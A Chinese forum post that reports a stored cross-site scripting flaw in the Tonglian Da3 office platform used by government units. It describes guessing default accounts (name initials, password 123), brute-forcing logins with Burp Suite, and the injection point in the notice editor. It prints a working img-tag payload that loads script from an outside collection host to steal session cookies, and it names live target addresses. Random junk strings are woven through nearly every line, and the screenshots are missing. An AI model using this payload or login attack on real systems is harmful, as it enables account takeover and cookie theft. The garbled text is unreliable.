" ` _9 ~7 X$ A. ^
, W3 C( d( |- Q' t1 B) T8 K9 Y
同联Da3协同办公平台后台通用储存型xss漏洞2 O' x' v6 g7 r7 ^# `
5 u6 J& E1 m' E( T& x) g2 F
6 |9 d$ Q+ I7 `
平台简介:
{4 K) h0 ]3 n
5 y( a" I4 Z D6 i/ D/ |8 s ( G1 d; B+ l, ]1 i( F9 B, H
; V1 J. t6 m4 w8 w8 N }' k
0 m! s+ x) V& H- o) F
2 O% b5 P1 ~8 A, C 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
8 I3 _8 T! f. o* N1 x4 ?1 T9 {* E同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
$ Z- Q' t- V; }. _2 z* M同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
/ R4 v1 o# J* D
( Z* i/ D6 s4 h) i4 U
' Q0 D# a0 e2 t4 N% M+ e$ R
, \+ O4 u w9 w- ^6 U
& c7 S: p# A& p* g* c `5 R' F0 t( s
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址: R3 y% y5 K/ z0 O( [6 o2 @
3 I0 A3 W3 S4 M3 h0 l+ u$ i , q7 W4 q& v' Y: ^+ A9 a' g
0 e1 D4 P1 d" h( y! p% y K
/ a, @- [+ l, ]. z
+ a! _, I. e, I# O B! V http://1.1.1.1:7197/cap-aco/#(案例2-)
9 Z) W" H) P/ g+ W
+ G" w6 A2 X1 e+ a : z5 L$ v6 q% x, ?' k" v
http://www.XXOO.com (案例1-官网网站)
1 l- G" P+ ^ n: o- U3 a! |
% Q* \" S0 c& r2 ?0 u/ J. a, ~" Q/ w1 m
" b8 I7 V7 G+ ?$ Q
漏洞详情:
2 R9 a- Z! p7 H
7 v0 j: ?2 B$ H5 l# U2 r
% `, ]' N* a: P9 R+ f3 S Z( t 案例一、/ R- r# ^ L" k6 d' [& z
8 {5 e' s4 X. q, W9 X # J" f) n; N' M
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试& Y+ r5 E( _7 k0 h: I8 G
! i2 q3 Q4 `. G8 y7 ]6 ?- ?( e
0 @1 k$ ^) ~$ p( J! ^; n
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
! L7 X8 W# O0 x: c: ^+ v" o
9 ]. y6 T6 g# M( S/ U
L5 c) n+ N" r& k
) j2 _% C( F/ S0 u
! N: P( d% `! W9 ?9 f% @$ [) r
( x; y$ y( J, W: L 
! [& Z* ^. p& a
, C7 M) f9 @9 S5 p
9 _# Z# Z' y* Z4 J. R8 u: a! ]) ? status为302即表示破解成功,然后找个破解成功的账号登录系统。然后在通知公告---通知公告发布-拟稿处存在储存型xss漏洞,我在编机器里填写好标题、选择人员,点html如图:
( [6 {7 H2 }0 t+ G! |
; V5 M& H- d+ t% {
6 a- J! M! x( T$ n+ }$ z
# O6 O0 `: r: `+ X# r" l/ h$ [) o
3 h' A) z' S! W, F; A ; D1 e! X1 H L% t
6 W* V; }$ ]# A# B, r
. V- N% Q" o3 _ z- }8 X " }# j; M; ~; h7 q: y
然后插我们的xss跨站代码(经过测试发现过滤了好多标签,比如script,没过滤img、iframe标签),这里我们用img标签来测试,payload如下
( B9 R' L% S/ f+ v6 E' @
9 m9 B; _5 G; K
. N4 G* ~" N( \' T" e& N: J
# s: g; E* F. U L4 k8 R5 R9 O
6 ~ D+ m" G4 j) x# D" m; g
4 h. j1 Y# {5 \: t <img src=x9 n' [3 K. M+ M1 k8 N
onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.6kb.org/7OO7GQ?1510065652';>,如图:
/ [3 E V$ ]/ U& z
2 h( W5 L) K: Y- I9 u5 D & r+ a/ I R/ T7 y8 @6 d
! O# c2 h0 k- Q# H) K$ q1 [0 E, K& G
, O, t# I1 H* k6 ` {3 f0 E I & F2 h7 H, i; H$ L3 t! V4 ?6 m+ F
然后发送,接收cookie如图:
" p3 Z+ x7 ^ C! ]0 m$ F# j
! O+ O5 [. v! r& M6 H I . ~3 }6 E! L1 J) ~# s% G
2 ?* \$ k/ E/ @4 s1 I* j
* e7 g# n& p A- q" Y: B' y! R# k9 ]* S
$ { n, U# T8 R/ Z, m 6 m( E I7 N# v' I
* u/ ]4 F5 g; I0 b& K/ P `) J 0 x) g' j7 Z* F9 N. U$ k. O( R. ?
a/ T- N+ O2 `( H' t k
' |! h5 `# @ _ {( |# |
. |' @) b6 i& d! z* i
$ h4 w9 h0 B( K- g/ X& b
, w1 Q$ w4 @+ [4 s4 y
- o! e6 x% {" u, [. ` 
, A9 b0 Y; \# G' H8 t" A
7 Q6 j) }% j( A' @" I$ p* z. | 4 o) v8 ^& F6 x" v3 ~; P
8 N9 N( t% A% F |
2 [ ^0 e0 V! L9 o 7 ?% C2 s8 _6 Q: N9 s* f
9 T$ F9 ~% J" ~: C& _
' c/ \# j! j4 E/ j! ^
: F# T. P5 x( z; O' E" E7 K& f 案例2、 3 o7 K8 l9 z) g
! f% ~4 G4 X2 g: E' J
% ?2 \, j1 E2 o3 l4 w5 J
前面步骤都一样,下面看效果图: ! c6 T/ X) c# D0 J" ]. q
+ [5 [; P, G" ]: U. x v $ e+ \3 v% f s1 Q! `2 K( d
! s5 ]: {2 W: A: p) r
# u5 M8 W* V. ` ^# |% i. i' s- O
. Y" c/ U3 R0 B5 k1 Y; G6 F a
( G& w* ~2 p! T8 K( Q7 l0 T; P i
8 X) U! K! @! S7 T
% a4 J/ `% \8 V8 w
' ~% `2 z% ?" X
* U; u0 a! F! s% _. j 9 o6 @. t# X5 Z( |
& m; p: i. D& D; o; t$ Q
9 S$ I- S& s. |2 C: @) } ) x" D$ Q& j$ w
6 ]9 H! i* x( O# v8 a; ~- l
1 i, j# M w0 \/ L. ^
\! n7 |) t1 }( v1 a4 E 2 b0 [8 ]$ x0 I% |8 i6 n ~$ f+ ]
' M4 N9 A, ^1 \
, i+ Z+ P$ ]" \) m5 B3 W$ ? O
* u8 N# l# n1 P; F
0 D d3 L ?0 I U! g M
( `5 A4 p- k3 |: s/ A
) O- f+ B5 c- [/ e v
- k) c) O) _" i3 M' Y9 N+ r
) l* n1 F! B9 y
' R# P/ Y% ^* s v: k& c
% h, P2 ^4 d: k5 r9 D# V
发表于 2018-10-20 20:14:15
收藏
支持
反对